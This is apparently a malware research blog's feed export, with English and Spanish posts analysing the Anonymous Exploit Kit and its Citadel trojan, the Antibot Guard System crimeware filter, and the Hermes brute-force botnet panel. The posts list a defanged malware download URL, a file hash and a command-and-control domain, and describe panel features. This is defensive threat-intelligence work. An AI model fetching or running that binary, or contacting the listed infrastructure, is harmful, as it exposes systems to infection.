tag:blogger.com,1999:blog-57072998210542108912024-03-12T19:47:22.259-07:00Laboratorio Malwaremalware research laboratory cyberintelligence virus troyans banker fraud bots botnetsJose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.comBlogger41125tag:blogger.com,1999:blog-5707299821054210891.post-50893142437906272832013-02-11T07:28:00.001-08:002013-02-11T07:28:45.780-08:00Anonymous Exploit Kit<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-H893jfTIoYY/UReY6I9s3cI/AAAAAAAAAd0/FTvED1Ywqxc/s1600/anonymous-exploit-kit-login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;">It have been found a new malware injection kit named "Anonymous exploits kit"</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br />It is located in the domain zaebal11.uni.me hosted on an IP of Panama.<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">The infection vector that drops the trojan is:<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">hXXp://zaebal11.uni.me/loads/</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br />It downloads the malicious binary:<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">hXXp://zaebal11.uni.me/loads/cita.exe<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">Binary size cita.exe: 271622<br />MD5: 6b7a7415276014b9a9e6350724f4cae7<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">This malware infects the user with the Citadel Trojan which tries to connect against the fraudulent domain netreverseram.ru that is currently idle.<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">Access to the statistical panel of "Anonymous exploits kit" is via URL address:<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">hXXp://zaebal11.uni.me /loads/statistics/login.php</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Showing the following screen:<br /> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-H893jfTIoYY/UReY6I9s3cI/AAAAAAAAAd0/FTvED1Ywqxc/s1600/anonymous-exploit-kit-login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://4.bp.blogspot.com/-H893jfTIoYY/UReY6I9s3cI/AAAAAAAAAd0/FTvED1Ywqxc/s400/anonymous-exploit-kit-login.jpg" width="400" /></a></div>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Once inside the panel it can see the tracking information of infected users, the victim's home country, operating system version, browser version etc.<br /> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-NOMsAZ4qRIs/UReZAGmvaII/AAAAAAAAAd8/OhBvlZGH1I4/s1600/anonymous-exploit-kit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://1.bp.blogspot.com/-NOMsAZ4qRIs/UReZAGmvaII/AAAAAAAAAd8/OhBvlZGH1I4/s400/anonymous-exploit-kit.jpg" width="400" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br />At the time of analysis this kit was in a very initial state without any infected user yet. There are only traces of the authors of KIT from IP of Netherlands.</span><br />
<br />
<a href="http://4.bp.blogspot.com/-CJiSVcuHYPM/UReZyFEiCBI/AAAAAAAAAeE/QyqarBdbAY4/s1600/anonymous-files.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a><span style="font-family: Arial,Helvetica,sans-serif;"><br />The file structure of the KIT is:<br /> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-CJiSVcuHYPM/UReZyFEiCBI/AAAAAAAAAeE/QyqarBdbAY4/s1600/anonymous-files.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="http://4.bp.blogspot.com/-CJiSVcuHYPM/UReZyFEiCBI/AAAAAAAAAeE/QyqarBdbAY4/s400/anonymous-files.jpg" width="400" /></a></div>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"> As remarkable new code of all files that make up the kit have been encrypted in Base64<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">This KIT takes advantage of vulnerabilities discovered for Java and PDF to infect the user with configured exploits in the kit:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-lUisznnv3pE/UReZ8PfWikI/AAAAAAAAAeU/yZFxeuZfkvM/s1600/anonymous-files2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="http://4.bp.blogspot.com/-lUisznnv3pE/UReZ8PfWikI/AAAAAAAAAeU/yZFxeuZfkvM/s400/anonymous-files2.jpg" width="400" /></a></div>
<br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Exploits are also encrypted so they couldn’t be reused by other criminal groups, and certainly when criminals finish adapting the kit will have the latest vulnerabilities zero-day discovered for Java</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br />In fact in the same fraudulent domain is hosted the famous Control panel Multilocker Trojan or Trojan Police that uses Java exploits to spread</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-IGG4plWTgqY/UReaBVH-YhI/AAAAAAAAAec/CXxbHqa_uZk/s1600/multilocker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br />As showed in the following screens:<br /> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-IGG4plWTgqY/UReaBVH-YhI/AAAAAAAAAec/CXxbHqa_uZk/s1600/multilocker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://4.bp.blogspot.com/-IGG4plWTgqY/UReaBVH-YhI/AAAAAAAAAec/CXxbHqa_uZk/s400/multilocker.jpg" width="400" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;">And the list of cheated users who have already made payments to unlock their computers<br /> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-rOxX9O8tqHs/UReaF71ovBI/AAAAAAAAAek/tWiHFncavac/s1600/multilocker-B2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="http://2.bp.blogspot.com/-rOxX9O8tqHs/UReaF71ovBI/AAAAAAAAAek/tWiHFncavac/s400/multilocker-B2.JPG" width="400" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /></span>Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-7530106137439387322013-02-10T05:03:00.001-08:002013-02-10T05:03:56.008-08:00ANONYMOUS EXPLOITS KIT<br />
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Se ha
encontrado un nuevo kit de inyección de malware llamado “Anonymous exploits
kit”<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Se ha
localizado en el dominio zaebal11.uni.me alojado en una IP de Panama.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">El vector
de infeccion que inicia la descarga del troyano es:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://zaebal11.uni.me/loads/<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Que
descarga el binario malicioso:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://zaebal11.uni.me/loads/cita.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Tamaño del
binario cita.exe: 271622<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">MD5:
6b7a7415276014b9a9e6350724f4cae7<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Este
Malware infecta al usuario con el troyano Citadel el cual intenta conectarse contra el dominio
malicioso netreverseram.ru que actualmente esta inactivo.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Se accede
al panel estadístico del Anonymous exploits kit mediante la dirección:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://zaebal11.uni.me
/loads/statistics/login.php<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Que muestra
el siguiente aspecto:</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-H893jfTIoYY/UReY6I9s3cI/AAAAAAAAAd0/FTvED1Ywqxc/s1600/anonymous-exploit-kit-login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="http://4.bp.blogspot.com/-H893jfTIoYY/UReY6I9s3cI/AAAAAAAAAd0/FTvED1Ywqxc/s320/anonymous-exploit-kit-login.jpg" width="320" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Una vez
dentro del panel se puede observar el seguimiento de la información de los
usuarios infectados, el país origen de la victima, su versión del sistema
operativo, versión del navegador etc.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-NOMsAZ4qRIs/UReZAGmvaII/AAAAAAAAAd8/OhBvlZGH1I4/s1600/anonymous-exploit-kit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://1.bp.blogspot.com/-NOMsAZ4qRIs/UReZAGmvaII/AAAAAAAAAd8/OhBvlZGH1I4/s400/anonymous-exploit-kit.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">En los
momentos del análisis el KiT se encontraba en un estado muy inicial sin ningún
solo usuario infectado todavía. Solo hay trazas de los autores del KIT desde
una IP de Holanda.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">La
estructura de ficheros del KIT es la siguiente:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-CJiSVcuHYPM/UReZyFEiCBI/AAAAAAAAAeE/QyqarBdbAY4/s1600/anonymous-files.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="http://4.bp.blogspot.com/-CJiSVcuHYPM/UReZyFEiCBI/AAAAAAAAAeE/QyqarBdbAY4/s400/anonymous-files.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Como
novedad el código de todos los ficheros que componen el Kit han sido cifrados
en Base64</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Este KIT
aprovecha las vulnerabilidades aparecidas para Java y PDF para infectar al
usuario según los exploits que tiene configurados en el kit:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-lUisznnv3pE/UReZ8PfWikI/AAAAAAAAAeU/yZFxeuZfkvM/s1600/anonymous-files2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="http://4.bp.blogspot.com/-lUisznnv3pE/UReZ8PfWikI/AAAAAAAAAeU/yZFxeuZfkvM/s400/anonymous-files2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Los
exploits también van cifrados para que no puedan ser reutilizados por otros
grupos y seguramente cuando terminen de adaptar el kit contendrá las ultimas
vulnerabilidades aparecidas para JAVA.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">De hecho en
el mismo dominio esta alojado el famoso panel de Control del troyano
Multilocker o troyano Policia que aprovecha los Bugs de Java para propagarse. <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Tal como
muestran las siguientes pantallas:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-IGG4plWTgqY/UReaBVH-YhI/AAAAAAAAAec/CXxbHqa_uZk/s1600/multilocker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://4.bp.blogspot.com/-IGG4plWTgqY/UReaBVH-YhI/AAAAAAAAAec/CXxbHqa_uZk/s400/multilocker.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Y la lista
de usuarios que ya han realizados pagos para desbloquear su equipo</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-rOxX9O8tqHs/UReaF71ovBI/AAAAAAAAAek/tWiHFncavac/s1600/multilocker-B2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="http://2.bp.blogspot.com/-rOxX9O8tqHs/UReaF71ovBI/AAAAAAAAAek/tWiHFncavac/s400/multilocker-B2.JPG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-65964471040807615512013-01-27T04:20:00.001-08:002013-01-27T04:20:31.834-08:00Antibot Guard System v.1.0 Experimental<br />
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Este nuevo
CrimeWare kit ha sido diseñado para filtrar el tráfico que accede al servidor
fraudulento donde está instalado. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">No se trata
de un Firewall. Funciona a nivel de control de la navegación de usuario.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Dispone de
una base de datos de HoneyPots de 132k.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Su misión
es eliminar todo el tráfico que los criminales no consideren interesante, de
esta manera logran un alto numero de positivos en los impactos de sus paneles
de control maliciosos, eliminando una gran cantidad de ruido que repercute en
la eficiencia del Panel, así como también eliminar todos los impactos que
provengan desde direcciones especializadas en la investigación Malware y demás
casas de seguridad lucha contra el cybercrimen.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-tkAyP5VmjMk/UQUa37FH31I/AAAAAAAAAc0/96V5k3lGNfk/s1600/antibot-admin.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="http://3.bp.blogspot.com/-tkAyP5VmjMk/UQUa37FH31I/AAAAAAAAAc0/96V5k3lGNfk/s400/antibot-admin.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Las
primeras referencias de este KIT aparece en los foros underground rusos
especializados en este tipo de temas. Siendo su autor XShaman que también
diseño el antiguo KIT de propagación de exploits “Shaman's Dream” y que en esta ocasión lo
ofrece a “El precio de emisión <st1:metricconverter productid="500”" w:st="on">500”</st1:metricconverter>
tal como se observa en su anuncio en el foro:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-GRrmAg-2KW4/UQUbBEAFWRI/AAAAAAAAAc8/QPPcxbm-vLw/s1600/antibot-E.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="393" src="http://1.bp.blogspot.com/-GRrmAg-2KW4/UQUbBEAFWRI/AAAAAAAAAc8/QPPcxbm-vLw/s400/antibot-E.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">De hecho si
se accede al panel de Control se observa una gran similitud con el Panel
del</span><span style="font-family: Arial; font-size: 11pt;"> </span><span style="font-family: Arial; font-size: 11pt;">“Shaman's Dream”</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 11pt;">Los
criminales </span><span style="font-size: 15px;">solo</span><span style="font-size: 11pt;"> necesitan instalar este kit AntiBot y modificar el archivo .htaccess
del servidor donde han montado la infraestructura para que todo el tráfico que
acceda a los paneles de control fraudulentos sea filtrado primero por el
Antibot Guard System. <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-FRSu3J-9mks/UQUbLIAMbdI/AAAAAAAAAdE/3GugsWvH-AU/s1600/antibot-login.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="http://3.bp.blogspot.com/-FRSu3J-9mks/UQUbLIAMbdI/AAAAAAAAAdE/3GugsWvH-AU/s400/antibot-login.JPG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">El Panel
tiene funcionalidades para denegar el acceso desde todas las direcciones IP de
HoneyPots que tenga registrados. Así como especial protección contra GoogleBot
, Antiproxy , etc.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Permite
prohibir el tipo de navegadores del usuario: MSIE, Firefox, Opera , Chrome para
elegir o definir un navegador especifico.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Contiene un
modulo de Geolocalizacion por IP GeoIP, para especificar una lista de países
que se deseen eliminar el ruido del tráfico de la forma US,GB,CA,AU. etc;<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Pantalla de
configuración del tráfico que se desee banear:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-YTofWP7gX08/UQUbS9EMvHI/AAAAAAAAAdM/qzb6NJBQWlk/s1600/antibot-baneo.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-YTofWP7gX08/UQUbS9EMvHI/AAAAAAAAAdM/qzb6NJBQWlk/s400/antibot-baneo.JPG" width="377" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Este menu
solicita una contraseña extra de seguridad para evitar modificaciones por
personal no autorizado.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Incluso
deniega el tráfico si no tiene instalado el usuario la aplicación FlashPlayer ,
para la cual existen bastantes vulnerabilidades actualmente. Y prohibir
usuarios que contengan ciertas cookies en su navegación.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">También
bloquea todas las peticiones que provengan de ciertas direcciones mediante el
análisis del parámetro Referer de la navegación del usuario, tales como las
direcciones de las Webs especializadas en recopilar datos de Malware Y
phishing:</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-X1bYr7PKFXA/UQUbbuP3RtI/AAAAAAAAAdU/7ASTX5M9xZ4/s1600/antibot-C.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-X1bYr7PKFXA/UQUbbuP3RtI/AAAAAAAAAdU/7ASTX5M9xZ4/s400/antibot-C.jpg" width="295" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-22600914214452348682013-01-22T15:36:00.000-08:002013-01-22T15:36:11.950-08:00PANEL HERMES. BOTNET FOR DISTRIBUTED BRUTE FORCE ATTACKS<br />
<div class="MsoNormal" style="background: white; line-height: 15.6pt;">
<span style="color: #333333; font-family: Arial; font-size: 11.5pt;">The Hermes botnet has
been developed to try to discover access
credentials to servers or other services by distributed brute force attacks.<o:p></o:p></span></div>
<div class="MsoNormal" style="background: white; line-height: 15.6pt;">
<br /></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial; font-size: 11.0pt;">We
are facing a botnet with a control panel almost identical to that used by the
Zeus Trojan but with different functionalities.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">It uses
infected zombies users by the Trojan as attack vectors to spread the work
process between them and that each infected computer perform multiple
authentication attempts against the target machine. So we have an incredible
Distributed Brute Force tool.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Here there
is the Control Panel of the Hermes Botnet:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><!--[if gte vml 1]><v:shapetype
id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:425.25pt;
height:300pt'>
<v:imagedata src="file:///C:\Windows\Temp\msohtml1\01\clip_image001.jpg"
o:title="hermes-B"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--><o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WmR05Ca8WSo/UP8Gn2L095I/AAAAAAAAAb0/JrglWK0b4P4/s1600/hermes-B.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="http://1.bp.blogspot.com/-WmR05Ca8WSo/UP8Gn2L095I/AAAAAAAAAb0/JrglWK0b4P4/s400/hermes-B.JPG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">the greater
number of compromised machines that command the panel greater brute force
attack power, by throwing thousands of authentication attempts from different
IP's.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">This gets
further confuse at security systems of attacked hosts by participating in the
incident a variety of machines from different IP's simultaneously, making it
difficult to block these IP's because is quite difficult to account for
continuous requests from the same IP as the
classic brute force attack incident.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">In the
settings menu shows the list of passwords to be used for brute force attack<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-v4YbTVW_KUk/UP8Gx5u05XI/AAAAAAAAAb8/grB5_Es1R1U/s1600/hermes-settings-B.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-v4YbTVW_KUk/UP8Gx5u05XI/AAAAAAAAAb8/grB5_Es1R1U/s320/hermes-settings-B.JPG" width="196" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">In the
Import option from the Panel Menu is selected the target machine against to
perform the distributed brute force attack and the name of the file that have
been previously uploaded with a list of usernames which will be launched the
authentication attempts against the victim host with the combinations pair of
username / password above<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-6WzEWVdP6DE/UP8G4VW2iEI/AAAAAAAAAcE/AOgX6nerG8Y/s1600/hermes-import.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="211" src="http://2.bp.blogspot.com/-6WzEWVdP6DE/UP8G4VW2iEI/AAAAAAAAAcE/AOgX6nerG8Y/s400/hermes-import.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">In this
panel Hermes that was analyzed is seen how criminals have used it for testing
using files with the IP address ranges of active machines that are hosted on
Dreamhost and Godaddy USA ISP. And also the list of the files containing the
list of usernames for the brute force attack.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The Usernames
files contain list of people surnames & names to test.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-c63VSO4eSJE/UP8HAbFsnAI/AAAAAAAAAcM/EN8PcLFV-3E/s1600/hermes-users.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-c63VSO4eSJE/UP8HAbFsnAI/AAAAAAAAAcM/EN8PcLFV-3E/s320/hermes-users.jpg" width="129" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">AT Note
option from panel can be seen how thousands of requests have been made against
Godaddy addresses to test the HERMES Panel.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-YlnxlXZ6vCw/UP8HGaDGk3I/AAAAAAAAAcU/zmyUEwM5udE/s1600/hermes-notes-B.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/-YlnxlXZ6vCw/UP8HGaDGk3I/AAAAAAAAAcU/zmyUEwM5udE/s400/hermes-notes-B.JPG" width="218" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">On day
05/12/2012 , 513.000 brute force authentication attempts were made against
Godaddy serves at 18:15. 410,000 brute force
authentication attempts were made at 21:15. 481.460 brute force authentication attempts were made at 22:44
......... etc<o:p></o:p></span></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-12123784641198858182013-01-22T13:44:00.000-08:002013-01-22T13:44:33.762-08:00PANEL HERMES. BOTNET DE ATAQUE POR FUERZA BRUTA DISTRIBUIDA<br />
<div class="MsoNormal">
